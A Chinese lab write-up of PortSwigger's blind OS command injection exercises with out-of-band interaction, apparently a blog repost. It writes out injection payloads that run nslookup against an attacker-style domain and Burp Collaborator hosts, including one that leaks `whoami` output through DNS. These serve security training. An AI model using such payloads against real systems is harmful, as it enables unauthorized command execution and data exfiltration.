【BP靶场portswigger-服务端4】操作系统命令注入-5个实验(全)(下)

简介: 【BP靶场portswigger-服务端4】操作系统命令注入-5个实验(全)(下)

5、利用带外(OAST)技术


1、简述:


可以使用一个注入命令,该命令将触发与您使用OAST技术控制的系统的带外网络交互。例如:


& nslookup kgji2ohoyw.web-attacker.com &


此有效负载使用nslookup命令对指定的域进行DNS查找。攻击者可以监视指定查找的发生,从而检测到命令已成功插入。  


2、带外通道还提供了一种从注入命令中提取输出的简单方法:


& nslookup `whoami`.kgji2ohoyw.web-attacker.com &


这将导致对攻击者的域进行DNS查找,该域包含whoami命令:


wwwuser.kgji2ohoyw.web-attacker.com


2、涉及实验:

实验4:具有带外交互的盲OS命令注入

实验5:具有带外数据泄漏的盲操作系统命令注入


实验4:具有带外交互的盲OS命令注入


part1:

填写反馈信息

使用Burp Suite拦截和修改提交反馈的请求

658153bffa834ad0918321b9814f1a8f.png

part2:


打开BP的Collaborator客户端


fdf98b49a17c44ff87c043df974ce757.png


复制服务器URL(这个是我的BP的提供的服务器)


4injhpna543tc1766dwv1466ux0noc.burpcollaborator.net

d6c91bf15b3741f887621742792b13c6.png


part3:


发送到repeater


修改email参数,将其更改为:


email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
我的是:
email=x||nslookup+4injhpna543tc1766dwv1466ux0noc.burpcollaborator.net||


8dfa4b15f0cf49b9997d321b161fae01.png

e0f22ea77f074a11b9bfb9e765de5bdb.png


part4:


修改数据包,并关闭拦截

b08e3e4f907441c492a819e9f1df6f3a.png

af00473bff264d8bbe32254e2363684d.png


fa8a4fe9fc1543b18b9a4d2afc8d31a1.png




实验5:具有带外数据泄漏的盲操作系统命令注入


part1:


填写反馈信息


使用Burp Suite拦截和修改提交反馈的请求


b5b12fa972cc40538ce2bdd921ef8f7d.png


part2:


打开BP的Collaborator客户端


aeb1c90ed00a4d20a791ab8aa8516299.png


复制服务器URL(这个是我的BP的提供的服务器)


fl45n2ug5x4nmill7s67s7u7jypodd.burpcollaborator.net

3da5d9d997a744da8a4693c8cbbe91fe.png


part3:


发送到repeater


修改email参数,将其更改为:


email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||
我的是:
email=x||nslookup+`whoami`.fl45n2ug5x4nmill7s67s7u7jypodd.burpcollaborator.net||


84a6db8d16b749ddafb436e9c78e62af.png

613c6d2f27a1463cbab6e3819a30ac67.png


part4:


修改数据包,并关闭拦截

c781c339afe44a84936077093734876a.png


bc96a9a5f1b749b3bce7b6bc7d886cb2.png


part5:


完成实验


我的用户peter-WKvUPX

04f4a3e0d5c54fc58b32546c07bddd59.png

d45cd798c33945108995a0328f4ddc36.png

7a9d5210e3524ca882aa9399a0bd0a56.png


2e4bc22d6f9843fb8ea48104d99862c6.png


7d62be979184459ab44139ed85f387fe.png

目录
相关文章
|
1月前
|
Linux 编译器 C语言
./build.sh:行1: g++: 未找到命令的错误问题在centos操作系统下面如何解决
通过上述步骤,您应该能够有效地解决CentOS系统中 `g++: 未找到命令`的错误。确保软件开发环境配置得当,对于顺利执行编译脚本和日常开发工作至关重要。如果问题依然存在,考虑检查脚本内的命令路径引用是否正确,或进一步排查系统配置问题。
118 0
|
1月前
|
存储 Java iOS开发
MacOS环境-手写操作系统-43-dir命令的实现 和 文件写入
MacOS环境-手写操作系统-43-dir命令的实现 和 文件写入
31 0
|
4月前
|
弹性计算 运维
阿里云操作系统智能助手OS Copilot实验测评报告
**OS Copilot 产品体验与功能反馈摘要** 运维人员发现OS Copilot易上手,文档清晰,助其高效排查故障(8/10分)。愿意推荐并参与开源开发。亮点在于知识问答,能快速筛选答案。相较于竞品,优点是新手友好、文档清晰,但功能扩展性待增强。期望增加系统错误排查与解决方案,并集成ECS等,以优化系统安装流程。
阿里云操作系统智能助手OS Copilot实验测评报告
|
4月前
|
弹性计算 运维 自然语言处理
阿里云操作系统智能助手OS Copilot实验测评报告
OS Copilot是阿里云Linux的智能助手,助于提升运维效率,通过学习用户习惯提供智能建议。开发者反馈其在DevOps场景中非常有用,给予10分帮助度评价。用户赞赏其命令执行功能,希望能扩展多命令执行和错误自动修正。与ACK、ECS等集成,可自动化部署和CI/CD流程。文档清晰,适合新手,用户愿意推荐并参与开源开发。
104 3
阿里云操作系统智能助手OS Copilot实验测评报告
|
4月前
|
弹性计算 运维 自然语言处理
阿里云操作系统智能助手OS Copilot实验测评报告
阿里云OS Copilot是一款专为Linux设计的智能运维助手,利用大语言模型提供自然语言问答、命令执行辅助和系统调优功能。软件维护工程师反馈,OS Copilot易于上手,文档清晰,对提升运维效率有显著帮助,评分10/10。其轻量级设计、准确的回答是主要优点,但可能在复杂场景下表现不足。用户期望扩展到更多Linux发行版,增加系统优化建议、代码优化和日志分析功能,并能与其他产品如ACK、ECS联动。希望能有异常处理提示和日志输出以增强问题定位。
117 14
|
4月前
|
弹性计算 人工智能 运维
阿里云操作系统智能助手OS Copilot实验测评报告
**摘要:** 在阿里云与CSDN联合的OS Copilot测试中,一名学生体验者发现该智能助手是强大的编程学习工具,给予10分的帮助评价。尽管有新手上手难度和兼容性问题,他仍强烈推荐并有意参与开源开发。OS Copilot的亮点包括直接的交互式知识问答、编程辅助及命令执行。相比其他产品,其优点是简洁和准确性,但需改进新手教程。用户期待更多功能,如系统优化建议,扩大操作系统支持,并建议与阿里云产品如ACK、ECS集成,以提升运维效率。
118 12
|
4月前
|
弹性计算 运维 自然语言处理
阿里云操作系统智能助手OS Copilot实验测评报告
OS Copilot是Alibaba Cloud Linux基于大模型构建的操作系统智能助手,其旨在通过自然语言问答、辅助命令执行及系统运维调优等功能,提升用户对Alibaba Cloud Linux的使用效率。
|
4月前
|
弹性计算 运维 自然语言处理
阿里云操作系统智能助手OS Copilot实验测评报告
OS Copilot是针对Linux的智能助手,助力学习、运维及编程。用户界面直观,自然语言交互方便新手。官方文档详尽,但初次配置略复杂,适合学生和开发者。在提高代码编写和调试效率、系统学习上得分高,功能亮点包括代码生成、问答和命令执行。用户期待更多操作系统支持、自动错误分析和系统排查功能。
184 3
|
4月前
|
弹性计算 运维
阿里云操作系统智能助手OS Copilot实验测评报告
简介:体验OS Copilot对于新人使用是友好的,教程给出的比较全面,还支持语言问答,命令执行等优点,还允许用户直接在操作系统内部使用阿里云,完成ECS的实例查询等操作。但是在系统兼容上表现出不足,对于服务器地区不明确。但总体来说测评者对OS Copilot其智能化、高效化、专业化评价是高的。
|
4月前
|
弹性计算 人工智能 运维
阿里云操作系统智能助手OS Copilot实验测评报告
阿里云操作系统智能助手OS Copilot实验测评报告
110 2
下一篇
无影云桌面